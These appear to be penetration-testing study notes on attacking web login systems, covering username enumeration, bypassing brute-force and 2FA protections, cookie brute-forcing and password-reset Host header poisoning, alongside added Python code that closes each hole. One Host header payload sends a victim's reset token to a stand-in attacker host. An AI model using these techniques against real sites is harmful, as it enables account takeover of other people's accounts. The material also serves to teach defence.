Attacking Authentication
Authentication
Authentication is the process of verifying the identity of a user or a client. Websites are exposed to anyone connected to the internet, which makes a robust authentication mechanism integral to effective web security. There are three types of authentication factors: something you know (password, security question), something you possess (MFA/2FA device, mobile phone, Authy, Duo), and something you are (biometrics).
Authentication vs Authorization
Authentication is the process of verifying that a user is who they claim to be, whereas authorization is verifying whether that user is allowed to do something or access something.
How do authentication vulnerabilities arise?
Weak authentication mechanisms that fail to adequately protect against brute-force attacks.
Logic flaws or poor coding that allow the authentication mechanism to be bypassed entirely.
Vulnerabilities in authentication mechanisms
Password based login
Multi Factor Authentication
Other authentication mechanisms (forgot-password flows and Host header attacks, reset links that never expire, cookies, session fixation, password change, 2FA, etc.)
Username Enumeration techniques
First, create a list of usernames or emails from the website's own pages, public sources, data dumps, generic username wordlists, etc.
Via response: for example, if entering an invalid username returns "invalid username", or if the generic message is "invalid username or password" but entering a correct username returns "incorrect password", that is an indication the username is valid (WordPress is a known example).
We can also enumerate valid usernames by spotting subtly different responses. For example, an incorrect username returns "Invalid username or password." while a valid username returns "Invalid username or password" with no full stop; that missing character indicates a valid username. Burp's grep-extract feature is useful for spotting this.
Usernames can be enumerated by differences in timing: after the Intruder attack finishes, open Columns at the top right and enable the "Response received" and "Response completed" columns, then look for a username whose response timing differs from the rest.
Usernames can also be enumerated via lockout: when brute-forcing the same username wordlist with a password list, a response such as "account locked due to too many login attempts" for one of the names suggests that name is a valid account.
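The response and timing leaks above come from the server doing different work and returning different text depending on whether the username exists. The following is an added example (not code from these notes) of a login check with those leaks beside one without them: the hardened version returns one fixed message, hashes a dummy credential when the username is unknown so both paths do the same amount of work, and compares digests in constant time. The user table, the PBKDF2 parameters and the dummy credential are constructed for the example.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # assumed PBKDF2 cost; tune for the deployment
GENERIC_MESSAGE = "Invalid username or password."


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_user(password: str):
    salt = os.urandom(16)
    return salt, hash_password(password, salt)


# Constructed user table (hypothetical data, not from the page).
USERS = {"alex@gmail.com": make_user("alex123")}

# Dummy credential used whenever the username is unknown, so that the same
# hashing work happens on both paths and timing does not reveal whether the
# username exists. The dummy password is never accepted for any account.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = hash_password("dummy-value-never-accepted", _DUMMY_SALT)


def login_leaky(username: str, password: str):
    """The behaviour the notes describe: two different messages, and no
    hashing work at all when the username is unknown (a timing leak)."""
    if username not in USERS:
        return False, "Invalid username"
    salt, stored = USERS[username]
    if hash_password(password, salt) != stored:
        return False, "Incorrect password"
    return True, "OK"


def login_uniform(username: str, password: str):
    """Hardened: identical message and identical work for both failure
    cases, and a constant-time digest comparison."""
    salt, stored = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    candidate = hash_password(password, salt)
    # The `username in USERS` guard makes the dummy credential unusable.
    ok = hmac.compare_digest(candidate, stored) and username in USERS
    return ok, ("OK" if ok else GENERIC_MESSAGE)
```

The same rule applies to the lockout leak: if an account-lockout message is only shown for usernames that exist, the lockout itself becomes the oracle, so the lockout response (and the counting behind it) should be the same whether or not the account exists.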
Bruteforce Protection Mechanisms
Locking the account the remote user is trying to access.
Blocking the remote user's IP address.
Bypassing brute-force protections: IP block
We can add X-Forwarded-For or X-Forwarded-Host headers and change the IP address in every request while brute-forcing.
Some websites reset the IP block counter after the attacker (the owner of the IP) successfully logs in to their own account. For example, with the attacker's own credentials alex@gmail.com / alex123, alternate the entries in the username wordlist (alex@gmail.com, victim@gmail.com, alex@gmail.com, ...) and in the password wordlist (alex123, test@330, alex123, ...).
Here alex@gmail.com / alex123 is tested first and succeeds; then victim@gmail.com is tested with test@330, and if that is incorrect, alex@gmail.com / alex123 is tested again, which resets the IP block counter, and so on.
If the login data is passed as JSON and we have a valid username, we can pass an array of multiple passwords in the password field instead of a single string.
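The three bypasses above (spoofed X-Forwarded-For, counter reset on any successful login, and a JSON array of passwords) each target one server-side decision. The following is an added example, not code from these notes, showing the three decisions made safely: the forwarded header is honoured only when the TCP peer is a known reverse proxy, a successful login clears only the counter of the account that logged in (the per-IP counter survives), and the JSON body is rejected unless both fields are plain strings. The proxy address and the failure limit are assumed values.

```python
import ipaddress
import json

# Assumed addresses of our own reverse proxies (hypothetical values).
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}
MAX_FAILURES = 5


def client_ip(remote_addr: str, headers: dict) -> str:
    """Honour X-Forwarded-For only when the TCP peer is one of our proxies.
    From anyone else the header is attacker-controlled and is ignored."""
    peer = ipaddress.ip_address(remote_addr)
    xff = headers.get("X-Forwarded-For", "")
    if peer in TRUSTED_PROXIES and xff:
        # The trusted proxy appends the address it saw as the last element.
        return xff.split(",")[-1].strip()
    return remote_addr


class LoginGuard:
    """Failure counters keyed by client IP and by target account."""

    def __init__(self):
        self.ip_failures = {}
        self.account_failures = {}

    def blocked(self, ip: str, username: str) -> bool:
        return (self.ip_failures.get(ip, 0) >= MAX_FAILURES
                or self.account_failures.get(username, 0) >= MAX_FAILURES)

    def record(self, ip: str, username: str, success: bool) -> None:
        if success:
            # Clear only the counter of the account that actually logged in.
            # Clearing the IP counter here is the reset bypass described above.
            self.account_failures.pop(username, None)
        else:
            self.ip_failures[ip] = self.ip_failures.get(ip, 0) + 1
            self.account_failures[username] = self.account_failures.get(username, 0) + 1


def parse_credentials(body: bytes):
    """Accept username and password only as plain JSON strings, so a request
    cannot carry an array of candidate passwords."""
    data = json.loads(body)
    username, password = data.get("username"), data.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        raise ValueError("username and password must be JSON strings")
    return username, password
```

The per-account counter is what stops the attacker from rotating IPs, but its response must be identical for accounts that do not exist, otherwise it becomes the lockout-based enumeration oracle from the previous section.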
2FA bypass techniques
Check whether the user is already treated as logged in before the 2FA code is entered, by going directly to /profile, /settings or a similar endpoint right after the password step.
If the 2FA code is four digits, it can easily be brute-forced with a number wordlist from 0000 to 9999 (minimum and maximum length 4 digits).
Can 2FA be disabled via password reset?
Can 2FA be disabled via email change?
Via response manipulation? (Enter a valid code and copy the response, then enter an invalid code and manipulate the response to match the copied one.)
Does web application's response leak the code?
Maybe change the status code from 400 to 200 OK?
CSRF on disable 2fa?
Reuse the 2FA code? Sometimes the code does not expire at all, or the expiration time is anywhere from an hour up to a day.
Clickjacking on 2FA disable?
Other authentication vulnerabilities
Maybe we are able to deduce how the "stay logged in" cookie is created and brute-force the cookie? For example, if it is created using
base64_encode(username:md5(password))
then we can add payload processing rules that first convert every password in the wordlist to its MD5 hash, then put the username followed by a colon in front of the hash (username:), then base64-encode the entire value. Here the stay-logged-in cookie can also be used in place of the session cookie, meaning we only need the stay-logged-in cookie rather than both the session cookie and the stay-logged-in cookie.
If the password reset URL is dynamically generated from user-controllable input, an attacker can supply their own host in the Host, X-Forwarded-Host, X-Forwarded-For or X-Host header, and when the victim clicks the link, the reset token is sent to the attacker's server.
Check for dangling markup in the Host header, such as:
Host: normal-site.net:'><a href="https://evil-url.net/?
Anything after the ? is treated as a GET parameter and is included in the request, e.g. https://evil-url.net/?please+login+with+this
We can also brute-force a password via the change-password functionality. For example, in an authenticated state an application lets a user change their password by entering the current password, a new password and a confirmation of the new password. Imagine a situation where entering an incorrect current password with matching new/confirm values results in an automatic logout, and entering the correct current password with two different new/confirm values results in "new passwords do not match".
But entering an incorrect current password with two different values for new password and confirm password says "current password is incorrect". Analysing this flow, we can set the brute-force position on current_password, enter two different values for new password and confirm_new_password, and run the attack: when the correct current password is hit, the response changes to the new-password mismatch message.
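The oracle above exists because the current-password check runs first and its outcome is visible in the message before anything that would end the session. The following is an added example, not code from these notes, with the leaky ordering beside a hardened one: the new/confirm pair is validated before the current password is even looked at, so a mismatched pair always gets the same answer, and every wrong current password counts toward a limit that ends the session. The account class, hash parameters and failure limit are constructed for the example.

```python
import hashlib
import hmac
import os

MAX_CURRENT_PASSWORD_FAILURES = 3   # assumed limit before the session is ended


class Account:
    """Constructed in-memory account with a session flag (hypothetical)."""

    def __init__(self, username: str, password: str):
        self.username = username
        self.salt = os.urandom(16)
        self.digest = self._digest(password)
        self.failed_changes = 0
        self.logged_in = True

    def _digest(self, password: str) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", password.encode(), self.salt, 50_000)

    def verify(self, password: str) -> bool:
        return hmac.compare_digest(self._digest(password), self.digest)


def change_password_leaky(acct: Account, current: str, new: str, confirm: str) -> str:
    """The flow described above: the current-password result is visible
    whenever new != confirm, and that path never logs the user out."""
    if not acct.verify(current):
        if new != confirm:
            return "current password is incorrect"   # reachable without logout
        acct.logged_in = False
        return "logged out"
    if new != confirm:
        return "new passwords do not match"
    acct.digest = acct._digest(new)
    return "password changed"


def change_password_hardened(acct: Account, current: str, new: str, confirm: str) -> str:
    """Check the new/confirm pair first, so its message never depends on
    `current`; then count every wrong current password toward a limit."""
    if new != confirm:
        return "new passwords do not match"
    if not acct.verify(current):
        acct.failed_changes += 1
        if acct.failed_changes >= MAX_CURRENT_PASSWORD_FAILURES:
            acct.logged_in = False
            return "logged out"
        return "current password is incorrect"
    acct.failed_changes = 0
    acct.digest = acct._digest(new)
    return "password changed"
```

The remaining "current password is incorrect" message in the hardened flow is unavoidable for a usable form, which is why the attempt counter (or a rate limit shared with the login endpoint) is what actually removes the brute-force path.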